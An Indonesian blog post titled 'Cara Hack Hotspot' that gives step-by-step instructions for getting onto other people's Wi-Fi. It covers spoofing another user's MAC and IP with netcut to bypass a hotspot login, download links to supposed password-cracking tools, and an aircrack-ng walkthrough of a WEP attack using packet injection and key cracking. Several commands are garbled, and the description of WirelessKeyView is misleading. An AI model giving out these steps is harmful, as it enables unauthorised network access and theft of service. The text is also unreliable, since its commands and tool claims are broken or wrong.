Cara Hack Hotspot ~ Ivul varel

Cara Hack Hotspot



Cara Hack Hotspot

Cara Hack Hotspot

1. Download software netcut 3.0 (versi terbaru). KLIK OH YEZZ Dan jika kamu memakai windows 7, setelah install netcut, download winCap nya. KLIK CROT (Tujuan dari install netcut untuk melihat MAC address yang terhubung dengan kita).
2. Coneksikan komputer/laptop kita ke hotspot.
3. Jalankan netcut nya.
4. Pilih LAN Card / NIC yang kita gunakan dengan mengklik menu Choice NetCard hotspot+netcut+1
5. Lalu pindah ke menu utama, dan pilih network orang lain, jangan pilih network kamu maupun network server. hotspot+netcut+2
6. Pindah dan copy IP address dan MAC address dengan klik print table dan copy ke notepad. hack+netcut+3
7. Paste kan di notepad, kemudian edit nilai MAC address, pada contoh ini [00:26:5E:60:81:1C]. Hilangkan tanda [:] sehingga menjadi 00265E60811C. Nilai ini yang akan kita gunakan untuk merubah MAC address kita.
8. wokeyh, lalu disable dulu wireless LAN kita. Buka properties wireless LAN dan ubah nilai Local Administration MAC Network, default kosong. Isikan dengan nilai tadi, misalnya 00265E60811C. hotspot+netcut+4
9. Set IP wireless LAN kita dengan IP yang sama yaitu 192.168.182.18 dan isi juga DNS server address. hotspot+netcut+5
10. Eng ing eng, enable kan wireless LAN kamu, dan sekarang kamu connec tanpa menu login. NB: Untuk mengetahui DNS server address bisa dicek sebelum kita merubah MAC dan IP. Jadi waktu pertama kali kita terhubung ke hotspot, dengan cara mengetik perintah dari command prompt C:\>ipconfig/all

Cara Hack Hotspot


Code:
http://www.winpcap.org/install/bin/WinPcap_4_1_1.exe
Code:
http://www39.indowebster.com/8f8db2271a51d320b305faaee06a3dc2.rar
Cara Hack Hotspot

Wi-Fi (Wireless Fidelity) adalah koneksi tanpa kabel seperti handphone dengan mempergunakan teknologi radio sehingga pemakainya dapat mentransfer data dengan cepat. Wi-Fi tidak hanya dapat digunakan untuk mengakses internet, Wi-Fi juga dapat digunakan untuk membuat jaringan tanpa kabel di perusahaan. Karena itu banyak orang mengasosiasikan Wi-Fi dengan “Kebebasan” karena teknologi Wi-Fi memberikan kebebasan kepada pemakainya untuk mengakses internet atau mentransfer data dari ruang meeting, kamar hotel, kampus, dan café-café yang bertanda “Wi-Fi Hot Spot”.

Memang memakai jaringan hotspot Wi-Fi untuk membagi koneksi surfing internet cukup mengasyikkan, tidak perlu narik kabel panjang-panjang, cukup dengan wireless router dan sedikit konfigurasi, bisa membagi koneksi ke siapa pun juga. Jika kamu sering menggunakan jaringan terbuka alias open network karena client-clientmu yang di sekitar kamu.
Tapi bagaimana kalau wifi tersebut dilindungi oleh password, hal tersebut mungkin akan menjadi halangan buat kita.

Cara kerjanya seperti ini:
Teknologi internet berbasis Wi-Fi dibuat dan dikembangkan sekelompok insinyur Amerika Serikat yang bekerja pada Institute of Electrical and Electronis Engineers (IEEE) berdasarkan standar teknis perangkat bernomor 802.11b, 802.11a dan 802.16. Perangkat Wi-Fi sebenarnya tidak hanya mampu bekerja di jaringan WLAN, tetapi juga di jaringan Wireless Metropolitan Area Network (WMAN).

Karena perangkat dengan standar teknis 802.11b diperuntukkan bagi perangkat WLAN yang digunakan di frekuensi 2,4 GHz atau yang lazim disebut frekuensi ISM (Industrial, Scientific dan edical). Sedang untuk perangkat yang berstandar teknis 802.11a dan 802.16 diperuntukkan bagi perangkat WMAN atau juga disebut Wi-Max, yang bekerja di sekitar pita frekuensi 5 GHz. Software in melacak frekuensi yang dipancarkan oleh jaringan itu sendiri

Software Hack Hotspot

Code:
http://www.zi**u.com/download/8014791/wifi_Wireless_WEP_Key_Password__2010.rar.html
Cara Hack Hotspot

Mau ngenet tapi dana terbatas ? Mau internetan gratis tapi kesulitan mencari tahu password wifi ? Mungkin tutorial kali ini bisa memudahkan anda mendapatkan koneksi via wifi yang tersedia di kota anda.

Hack Password Wifi ini berasal dari sebuah tool sederhana yang akan membantu anda mencari jaringan wifi terdekat sekaligus memberitahu apa password yang digunakan.

Dengan cara ini anda tidak perlu lagi bingung berpindah2 tempat hanya untuk mencari internet gratis. Namun untuk bisa menikmati fasilitas ini, anda diwajibkan untuk melakukan download guna mendapatkan tool hack password wifi yang dimaksud.

Yang perlu anda ketahui bahwa hack password wifi versi ini menggunakan software WirelessKeyView. Namun anda tidak perlu bingung karena penggunaan software ini sangat mudah.

Jika anda sudah mengunduh tool tersebut, silahkan buka WirelessKeyView dan ia akan langsung mencari jaringan wifi secara otomatis yang terproteksi password maupun yang free.

Jika sudah siap, silahkan untuk mengcopy langsung password ke wifi yang terproteksi oleh password. Copy kalimat atau angka atau huruf atau simbol lain yang ada di bagian Key (Ascii). Untuk mencoba silahkan download tool dibawah ini:

Software Hack Hotspot

Code:
http://downloads.zi**u.com/downloadfile/16669369/wirelesskeyview.zip.html
Cara Hack Hotspot

langkah pertama :

- membuka shell
- jadi kita perlu menghentikan wifi kita terlebih dahulu dengan perintah airmon.
airmon-ng stop [alamat wifi anda misalkan: athO]
sekarang kita bisa mengubah mac address dari si wifi tersebut dengan mengetikkan perintah:
macchanger – mac 00:11:22:33:44:55 [wifi card extension]

sekarang kita masuk ke card up in monitor mode dan jalankan perintah :
airmon-ng start [wifi card extension]
sekarang kita memerlukan alamat mac address dari AP kita, untuk melakukan hacking ,sehingga memungkinkan
airodump-ng [wifi card extension] sekarang Anda akan melihat AP. untuk mengambil & mencantumkan alamat mac / BSSID dan saluran, tekan tombol CTRL + C pada keyboard anda untuk menghentikan airodump jumping atau kalau tidak channel kita akan menjadi masalah nantinya.
sekarang mari kita mulai menangkap paket data yang kita perlukan untuk hack . ketikkan perintah :
airodump-ng-c [channel]-b [bssid / alamat mac AP]-w [nama file] [wifi card extension]

misalnya:
airodump-ng-c 1-b 01:1 b: 11:78: D9: F2-w linksys ra0

setelah anda mengetikkan perintah tersebut Anda akan melihat beberapa info datang dari si klien, mac address, channel, data ect… sekarang anda telah bisa melihat data diatas kita harus mengisi data untuk sekitar 10-15 ribu untuk meng crack tombol sehingga kita membutuhkan kecepatan. sekarang kita akan menggunakan aireplay lain sehingga membuka shell dan ketik:
aireplay-ng -1 -0-a [AP mac alamat / bssid]-h [alamat palsu mac] [wifi card extension]

misalnya:
aireplay-ng -1 0-a 02:1 b: 11:78: D9: F2-h 00:11:22:33:44:55 ra0
Setelah itu Anda akan melihat otentikasi melanjutkan ke paket ulang data ke jalur akses yang akan memaksa untuk mengirimkan banyak paket yang akan anda dapatkan, gunakan untuk crack tombol demikian juga dengan ,
aireplay-ng -3-p 0841-c FF: FF: FF: FF: FF: FF-b [ap mac alamat / bssid]-h [alamat palsu mac] [wifi card extension] misalnya
aireplay-ng -3-p 0841-c FF: FF: FF: FF: FF: FF-b 02:1 b: 11:78: D9: F2-h 00:11:22:33:44:55 ra0
aireplay sekarang akan mulai membaca paket dan setelah menemukan salah satu celah , dapat digunakan untuk menghack kemudian anda akan diminta untuk menggunakan paket? tekan y kemudian masuk ke airodump shell anda. kemudian akan melihat data yang sangat cepat dan setelah itu anda akan mendapatkan 10.000 paket data.

kemudian lanjutkan dengan perintah ini:
aircrack-ng-b [mac alamat / bssid] [nama file yang digunakan sebelumnya +-01.cap]

misalnya
aircrack-ng-b 02:1 b: 11:78: D9: F2-linksys 01.cap
apabila tidak ada kendala aircrack dan akan mulai dengan paket decrypting / IV dan menemukan kunci WEP!
 


sumber
Previous
Next Post »
Post a Comment
Thanks for your comment